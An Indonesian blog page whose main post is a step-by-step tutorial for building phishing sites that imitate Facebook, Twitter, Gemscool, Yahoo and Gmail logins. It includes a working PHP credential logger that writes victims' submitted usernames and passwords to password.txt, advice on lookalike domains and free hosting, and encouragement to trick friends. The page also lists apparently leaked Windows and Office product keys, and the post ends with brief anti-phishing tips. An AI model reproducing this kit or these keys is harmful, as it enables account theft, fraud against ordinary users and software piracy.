Update Serial Number Windows and Office terbaru

Image
 Update Serial Number Windows 11, 10, 8, 7 and Office  saya harap kalian telah mengerti tentang bagaimana cara mengimput serial dari windows atau office kalian apa yang akan saya bagikan di sini hanya berupa key nya saja, akan di update selama stok tersedia kalau ada yang tidak di mengerti, silahkan tinggalkan koment di bawah Update Serial Key [21 August 2022] Win 10 RTM Enterprise Volume:MAK online BHXQD-CNMKV-VMWBT-2YM2B-HT9R4 Visio Professional 2010 VL online P6XDJ-74DGX-DKY4Q-G4Y7D-R3FP7 Update Serial Key [23 August 2022] Win 10 RTM ProfessionalN Retail online KGJBV-DNXFM-YVMKV-3RRGK-M98XT Win 10 RTM CoreSingleLanguage OEM:DM phone VN349-9CH6P-C8GJ4-Y88H7-GCQFC Windows Embedded Industry 8.1 RTM EmbeddedIndustry Retail online PYXNX-W99K2-FXHY2-823QK-V2YD7 Windows 7 Home Basic OEM:COA online (phone) PRKC9-HKMQJ-6TGK2-B6CMV-BW4FD Windows 7 Professional OEM:COA online (phone) 2VQP4-DGXKG-GP6B2-VW3PW-T4RWQ Windows 7 Professional OEM:NONSLP online (phone)

Cara Membuat Situs Phising Dan Tips Aman Menghindari Phising

Phising, berasal dari kata fishing. Yap, artinya memancing. Penjelasannya begini, phising akan mengarahkan korban ke sebuah halaman web palsu (fake webpage) yang hampir sama persis dengan halaman web aslinya (Spoofed webpage)
. Nah, dengan halaman palsu inilah, seorang hacker akan memancing korban untuk memasukan informasi yang dibutuhkan, (seperti username, password, dll). Dan ketika korban memasukan username dan password pada halaman login palsu (fake login), maka setiap informasi yang dimasukan akan disimpan pada webserver hacker. Kemudian dengan username dan password yang telah tersimpan itulah, hacker dapat leluasa memasuki akun korban dan melakukan apa saja terhadap akun korban tersebut.

Teknik ini sendiri telah banyak digunakn/diterapkan untuk mencuri username dan password yang sangat efektif selain dengan menggunakan keylogger, teknik ini biasa digunakan untuk mencuri akun email (Seperti Yahoo,Gmail,Hotmail, Dll) dan bebarapa situs jejaring sosial seperti (Facebook,Twitter,Friendster) bahkan situs-situs transaksi online seperti (Paypal,E-Bay) dan lain-lain.

Pada postingan saya kali ini saya akan membahas teknik untuk mencuri password (ingat hanya sebagai wawasan) di berbagai website dan ada beberapa tutorial yaitu untuk :


  • Facebook
  • Twitter
  • Gemscool
  • Yahoo & gMail
  • Mohon maaf untuk sementara ini hanya beberapa saja
jadi situs phising ini juga dapat diartikan sebagai fake login atau halaman palsu yang akan menyimpan data dan password korban, dan sekali lagi saya ingatkan ini hanyalah untuk pengetahuan semata, terimakasih dan ingat gunakanlah dengan bijak, agar indonesia maju,,hhh,oke lah saya kira cukup basa-basinya saya kira anda sudah cukup mengerti tentang situs phising, dan selain itu pada artikel kali ini saya juga menyertakan cara untuk menghibdari phising dengan aman,
Langsung saja untuk cara membuat fake login atau situs phising, hampir semua orang hacker, tau cara ini jadi untuk menjadi newbie hacker ikuti langkah berikut ini, eitzzz, tunggu dulu masih ada syaratnya sebelum anda membuat situs fake login atau phising anda harus mempunyai :

  • Hosting & domain
  • Nyali untuk berbohong hhh
  • Script (tenag sudah saya sediakan)
Ada 2 cara untuk membuatnya pertama, dengan cara mudah dan cepat jadi disni script sudah saya sediakan sendiri dan anda tinggal menguploadnya di web hosting anda. Dan cara kedua yaitu anda membuatnya mulai dari awal, seperti mengedit2 nama file, membuat script dll, oke langsung saja silahkan dipilih, untuk cara mudah hanya ada 4 script yaitu (facebook,twitter,gemscoo,yahoo&gmail) yang lainnya bisa anda buat sendiri di cara manual.

Cara cepat atau mudah :
  1. Pertama-tama anda harus mempunyai sebuah webhosting
    free hosting :
    http://www.kilu.de/
    Indo Free Hosting,
    000webhost
    http://www.net2ftp.com/
    coba pakai Indo Free Hosting atau 000webhost
  2. Setelah mempunyai sebuah webhosting, nyali anda akan diuji disini, bagi anda yg sudah pernah ikut dunia lain/pernah lihat dunia lain jadi anda pasti adalah orang yang pemeberani, oke selanjutnya download script-script untuk persiapan hack password nanti ada beberapa pilihan untuk download file sesuai kebutuhan anda :
  3. Setelah download jangan lupa ekstrak file hasil download tadi, lalu masuk ke file manager anda dan upload script tersebut kedalam web hosting yang sudah anda buat tadi, cara upload masuk ke File manager > Public_html > Upload , upload semua file yang sudah anda download tadi, masing2 ada( contoh : index-fb.html,password.txt,logs.php )
  4. Sekarang chomd file tadi ke 777, Buka file manager anda lalu centang file"password.txt" lalu pilih "CHOMD"
  5. Lalu centang semuanya atau ganti value menjadi 777 agar nantinya file dapat dijalankan.
  6. Sekarang website phising anda sudah jadi dan anda dapat menggunakan nyali anda untuk membohongi teman anda tentang web trsbut, jadi ketika teman anda mengetikan email dan password mereka akan langsung terekam/tercatat pad password.txt,
  7. Selamat mencoba dan semoga berhasil


Cara manual :

  1. Pertama-tama anda harus mempunyai sebuah webhosting apabila belum silahkan daftar pada sebuah hosting silahkan untuk daftar salah satu webhosting baca artikel saya, dan pastikan link/domain yang anda buat hampir menipu orang seperti facebooklogin.fb.com.
  2. Setelah membuat webhosting, Sekarang buka halaman login situs yang ingin anda buat fake login (login palsunya) disini saya akan gunakan facebook sebagai contoh, pertama-tama saya buka http://facebook.com/login.php setelah itu tekan Ctrl+U ,lalu muncul sebuah halaman html untuk fake login, salin script html tersebut atau CTRL+A lalu CTRL+C dan salin dahulu ke clipboard
  3. Setelah itu sekarang anda salin kode yang telah anda copy tadi ke notepad, kemudian cari tulisan action=http:/nul.facebook.com dan ganti urlnya atau tulisan berwarna merah menjadi logs.php , dan juga pada method="post" diganti menjadi method="get" , contoh <form id="login_form" action=logs.php method="get" lalu simpan dengan nama "index.html"
  4. Lalu, buat sebuah file dengan menggunakan notepad dengan script dibawah ini lalu simpan dengan nama logs.php gunakan ansi waktu menyimpan jangan dengan text document
    <?php header("Location: http://facebook.com/login.php"); $handle = fopen("password.txt", "a"); foreach($_GET as $variable => $value) { fwrite($handle, $variable); fwrite($handle, "="); fwrite($handle, $value); fwrite($handle, "\r\n"); } fwrite($handle, "\r\n"); fclose($handle); exit; ?>
    Untuk tulisan yg berwarna Biru anda bisa ganti dengan nama tempat login lain misal di twitter
  5. Sekarang, buat sebuah file lagi dengan menggunakan notepad dan jangan diisi apa-apa biarkan saja kosong lalu simpan pada folder yg sama tempat anda meletakan file-file sebelumnya agar nanti mudah dalam peng-uploadan, dan beri nama "password.txt"
  6. Selanjutnya adalah mengupload file tersebut kedalam web hosting anda dengan cara masuk ke cPanel > File manager > Pilih direktori public_html > Upload , dan pilih lokasi dimana file tersebut anda simpan, lalu pilih tanda centang untuk mulai meng-upload file, setelah itu pilih tombol back jika file berhasil diupload.
  7. Setelah file diupload sekarang CHOMD file password.txt ke 777 agar nantinya file dapat dieksekusi, caranya adalah centang pada file password.txt lalu klik CHOMD
  8. Selanjutnya centang semuanya atau ganti value menjadi 777 lalu klik simpan atau save
  9. Sekarang situs phising anda sudah dapat dibuka dan silahkan anda mencobanya,
    anda bisa melihat hasil phising pada file password.txt
  10. Selamat mencoba dan semoga berhasil


Anda sekarang dapat membuat situs phising dengan mudah bukan? berikut ini saya juga sertakan tips aman untuk menghindari situs phising, karena situs phising ini bisa sangat berbahaya apabila disalahgunakan oleh pihak-pihak yang tidak bertanggung jawab.



Tips aman cara mencegah dan menghindari bahaya dari situs fake login/PHISING

Lalu bagaiman caranya agar anda sendiri tidak menjadi korban para hacker yang menggunakan metode phising dalam modus operandinya?
Nah, agar nantinya anda tidak ditertawakan oleh sang hacker, berikut tips aman untuk menghindarinya
  1. Jika anda mengijinkan adanya sistem pemberitahuan otomatis melalui email, maka facebook secara rutin akan mengirimkan e-mail pemberitahuan kepada anda jika ada teman yang mengkonfirmasi, ada komentar, ada pesan masuk, atau yang lainnya. Di dalam e-mail pemberitahuan tersebut pasti ada link tautan yang akan mengarahkan anda kepada halaman yang dituju untuk melihat secara langsung isi pemberitahuan tersebut. Dan biasanya anda langsung mengklik link tautan tersebut, Anda akan diarahkan pada halaman aslinya, bukan pada halaman palsu? maka dari itu saya sarankan jangan pernah mengakses situs dengan mengkliik link tersebut. Biasakanlah selalu membuka halaman situs yang dituju langsung untuk melihat isi pemberitahuan tersebut.
  2. Jika akhirnya anda mengklik link tersebut, ada baiknya teliti URL yang ada pada address bar. Jangan pernah anda memasukan username,password ataupun informasi pribadi anda sebelum anda yakin pada halaman website yang asli. Biasanya walaupun tampilan halaman mirip dengan halaman aslinya, namun URL halaman palsu tidaklah sama dengan halaman aslinya. Misalnya http://facebook.co.cc , http://facebooklogin.16mb.com tidaklah sama dengan halaman aslinya yang http://facebook.com . Coba anda perhatikan gambar dibawah ini, sekilas tampilan halaman tersebut hampir sama dengan tampilan halaman log-in facebook bukan?. Tapi coba perhatikan urlnya, tidaklah sama dengan halaman asli dari facebook (ini adalah web phising yg telah saya buat)
  3. Pada halaman login facebook yang asli, jika anda memasukan username dan password yang salah akan tampak pesan pemberitahuan bahwa data yang anda masukan salah. Hal ini tidak terjadi dengan halaman login yang palsu. Ketika anda memasukan username dan password yang salah, maka halaman login akan kembali seperti semula atau tidak terjadi apa-apa. Nah inilah kelemahan dari situs phisiing yaitu tidaklah sama dengan halaman aslinya
  4. Anda bisa menggunakan cara ini, yaitu dengan download software anti phising untuk menghindari situs phising yang dibuat oleh para hacker nakal yang telah marak beredar saat ini. Berikut adalah beberapa list software anti phisng


    Download Anti phishing freeware and free phishing scam web site blocker:


  • Earthlink Toolbar Scamblocker
    Offers a check towards a phishing blacklist of sites
    Checks the owner and location of the web site
    Prevention against phishing and pop ups

  • GFI-MailEssentials prevents spam email and phishing attacks!
    Offers information about GFI-MailEssentials anti phishing software. How to avoid being scammed, recommended by Anti-Phishing.info to help stop Phishers!


  • Webroot's Phish net
    Phish Net uses a dynamic blacklist
    Phish Net stores your personal, financial information and checks for an encrypted connection known as Secure Sockets Layer (SSL) prior to transmitting

  • Vault.WholeSecurity’s Web Caller-ID, not yet released
    Analyzes the characteristics of a web page in real time to determine if it is a spoof site and to deliver a browser-based warning to consumers before they can visit the fraudulent page

  • Spybot - Search and Destroy
    Free Anti-Spyware and adware. Has an option to "lock" the HOSTS file. Write-protect HOSTS file with Search and destroy:
    1. Click "Mode", selecting "Advanced Mode".
    2. Click "Tools" in the left pane.
    3. Click "IE tweaks" in the right pane.
    4. Check "Lock Hosts file read-only as protection against hijackers"
  • SpywareBlaster
    Free anti-spyware - Can encrypt and create a backups of your HOSTS file

  • Winpatrol 8.0
    Anti malware - Will allow you to lock your HOSTS file and will monitor changes

  • CoreStreet's Spoofstick
    Helps users detect spoofed (fake) websites

  • TrustWatch Toolbar
    Real-time check for if the web site you are dealing with has been Verified by a Trusted Third Party. It is like doing a credit check of the web site before you supply personal or confidential information
Software Anti Phising Source : http://www.anti-phishing.info

Apabila anda sudah terlanjur memasukan email dan password di halaman tersebut cepatlah ganti password anda, apabila sudah diganti oleh hacker. Maka bukalah email untuk mereset dan mengembailkan akun anda.

Sekian informasi seputar dunia IT(internet teknologi),hacking dan apabila ada kesalahan kata penulis mohon maaf yang sebesar-besarnya, apabila ada pertanyaan seputar post ini anda bisa hub saya melalui kotak admin dibawah ini,kritik dan saran bisa anda sampaikan di kotak komentar, terimakasih atas perhatianya dan kesediaan anda membaca postingan ini

Waalaikumsallam Wr. Wb. 

Comments

Popular posts from this blog

Download Subtitle Naruto Shippuden Bahasa Indonesia

Update Serial Number Windows and Office terbaru

36 Artis China Paling Cantik